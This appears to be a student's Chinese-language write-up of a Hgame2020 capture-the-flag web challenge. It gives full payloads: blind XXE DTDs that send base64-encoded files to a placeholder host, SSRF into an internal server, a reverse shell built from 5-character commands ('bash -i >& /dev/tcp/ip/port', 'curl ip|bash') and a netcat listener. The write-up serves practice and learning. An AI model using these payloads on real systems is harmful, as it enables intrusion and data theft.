logo

Hgame2020 Week4 新人スタッフ(Akira)

Web

0x01 代打出题人服务中心

这道题没做完但是做了一大半还是写一下吧

image-20200215200035696

Burp抓包,发现发送了xml,因此考虑是XXE

Burp payload

1
2
3
4
5
6
7
8
9
10
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/xxe.dtd">
%remote;%int;%send;
]>
<msg>
<id>1</id>
<name>1</name>
<level>1</level>
<time>1</time>
</msg>

xxe.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=submit.php">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

image-20200215200829692

成功读出 submit.php

询问Annevi得知内网还有一台服务器

改一下xxe.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/proc/net/arp">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

image-20200215201544116

得到内网服务器地址

改一下xxe.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

image-20200215201750052

改一下xxe.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76/?token=mytoken">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

然后?然后就没有回显了

考虑到可能是由于过大出错了,采用zlib压缩再读

改一下xxe.dtd

1
2
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

得到以下字符串,保存到一个txt中

1
1VhJb9NAFL73V6QGNYsgE1VCRc1SVLVBSBy5UTRK7ElsxZs8Q0OFuSBOSNyQWC7cEKfmSA9I/JkCyb+AeJzEjpe8SSYCLGU8mXnzlu9tkzRURyOtBnU7doGyC5M0FdUxHe+wcKMWPEprJ3P3+Fhp7ZmsfuTqbqPrFVCLeJ7jYY+4jscMu99A06NZ7A8OpuxL+URcSg3CqVznSoQjgO1N5gyIvWd3qVuHSGhy0nsg3vj+6SMI08d5RCcn3AnFQNMihN+TEAajx7Ut7RqUEgbCmQMCArvMuT/nwviX5KgZJFfwzD5lPPr64+rz9dXrny+//Pr4avL+0/W3N4E248vvk3eXu5wfOgrWmopIQLwQiIiOawjHA8hAnTH3ECFVJ+qAeEJ2VOW6ri6SIFLBmLHtGSbBfcKw6tiM2IxKKxRT/4mEhtED5gUch92mSFg4A1goy822SHpN3n4Yj0Zr5RM4jHSjr5t/PgxPPS/N2Ri3Hzw8xXhLzYF2bK3rPNtKOSii846HhsMh0pllolAUAhX4KjzRLO3OxmgvKli/Y5H92n5NgUMioKtA76mHzgQ1YmugGZ68AhO6SiTmQGqq+t9WUyA1wrq9leYg+eJ0vt6lSeDOFIIh8dYEE2tpW8GfPu1SJjESBeC5Je23AIgTqDbOsmMTX9ELyoglEVJLE+rXxKSEa7tOfMvNRw+WjxIzRRL6CwssLvu2F4JZRRWQUcL3p3b7biASVZKW4+kTTrPQwRHSVbQp5+BjVEBinsINRJP0PFoc8fnUj26nrWXRrjqXNSZViCykmzpjn7a54kj4iiIRrpXmmM3ZL5+Ks5YDQjrE6RI3A3pTfdOw4+PZHLqzJTtSzmd4RCaKPs6T+K+iOA34cjaTRCxGoyQ+XxnGaWEFAyEv91aajuN5F5Qp5Mf94mO+vvQq8d1ybGvpXLZcEeoSLud3yP999FG0W1ZQrGvuLN7BH9m/AQ==

用php解码

1
2
3
4
5
<?php
$myfile = fopen("in.html", "w");
$txt = file_get_contents("php://filter/convert.base64-decode/zlib.inflate/resource=in.txt");
fwrite($myfile, $txt);
fclose($myfile);

image-20200215202516164

由于分辨率下面出了点问题,实际上应该是这样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
error_reporting(0);

$token = @$_GET['token'];
if (!isset($token)) {
die("请带上您的队伍token访问! /?token=");
}
$api = "http://checker/?token=".$token;
$t = file_get_contents($api);
if($t !== "ok") {
die("队伍token错误");
}

highlight_file(__FILE__);

$sandbox = '/var/www/html/sandbox/'. md5("hgame2020" . $token);;
@mkdir($sandbox);
@chdir($sandbox);

$content = $_GET['v'];
if (isset($content)) {
$cmd = substr($content,0,5);
system($cmd);
}else if (isset($_GET['r'])) {
system('rm -rf ./*');
}
/* _____ _ _ ______ _ _ _____ ______ _______ _____ _______ _
/ ____| | | | ____| | | | / ____| ____|__ __| |_ _|__ __| | |
| (___ | |__| | |__ | | | | | | __| |__ | | | | | | | |
\___ \| __ | __| | | | | | | |_ | __| | | | | | | | |
____) | | | | |____| |____| |____ | |__| | |____ | | _| |_ | | |_|
|_____/|_| |_|______|______|______( )_____|______| |_| |_____| |_| (_)
|/
*/

可以看出利用 &v= 可以执行长度小于等于5的命令,&r 可以删除目录下的所有东西

然后询问Annevi学长得知要反弹shell

网上找了个反弹shell命令

1
bash -i >& /dev/tcp/ip/port 0>&1

然后再构造命令

1
curl ip|bash

1
2
3
4
5
6
>bash
>\|\\
>ip\\
>\ \\
>rl\\
>cu\\

再利用 ls -t>a 就可以形成命令了

然而我太菜没想到要构造 ls -t>a就凉了

构造命令

1
ls -t>a

1
2
3
4
5
6
>ls\\
ls>_ #由于顺序问题先将ls写入_文件中
>\ \\
>-t\\
>\>\a
ls>>_

然后再运行命令

1
2
sh _
sh a

就可以了

将以上命令按顺序写成dtd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#1 >ls\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3els%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#2 ls>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=ls%3e_">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#3 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#4 >-t\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%2d%74%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#5 >\>\a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%3e%61">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#6 ls>>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%6c%73%3e%3e%5f">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#7 >bash
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%62%61%73%68">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#8 >\|\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%7c%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#9 >ip\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%69%70%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#10 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#11 >rl\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%72%6c%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#12 >cu\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%63%75%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#13 sh _
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%5f">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#14 sh a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%61">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

VPS监听对应端口

1
nc -lvp port

然后用Burp的intruder模块单线程依次发送,让它逐个访问并执行dtd

image-20200215210011468

image-20200215210032174

image-20200215210403630

然后?然后我也找不到flag(

问了Annevi得知flag在 /etc

结果flag文件名叫 f1(数字)agg 怪不得find不到

image-20200215211438138

参考文章

https://www.cnblogs.com/backlion/p/9302528.html

https://xz.aliyun.com/t/3357#toc-8

总结

这周一道题都没做出来==,直接原因是我原来的VPS由于众所周知的原因用不了了,第一次用AWS Educate弄了两天,又心血来潮开了个博客只有两天在做题;根本原因是:

我太菜了
![image-20200215212053520](/hgame2020/week4/image-20200215212053520.png)

image-20200215212123069

虽然这个排名结果让我很开心但感觉被高估了(坐等线下被反杀

总之hgame2020还是很开心的,想到4周前php只会拿别人的跑,python只会拿来当计算器的自己,感觉真是学到了很多东西,还有幸认识到了学长(学姐)和大佬们。希望线下不要爆0吧(又是一个flag),爆0就明年再来体验一下(

附结赛丢人聊天记录

img

img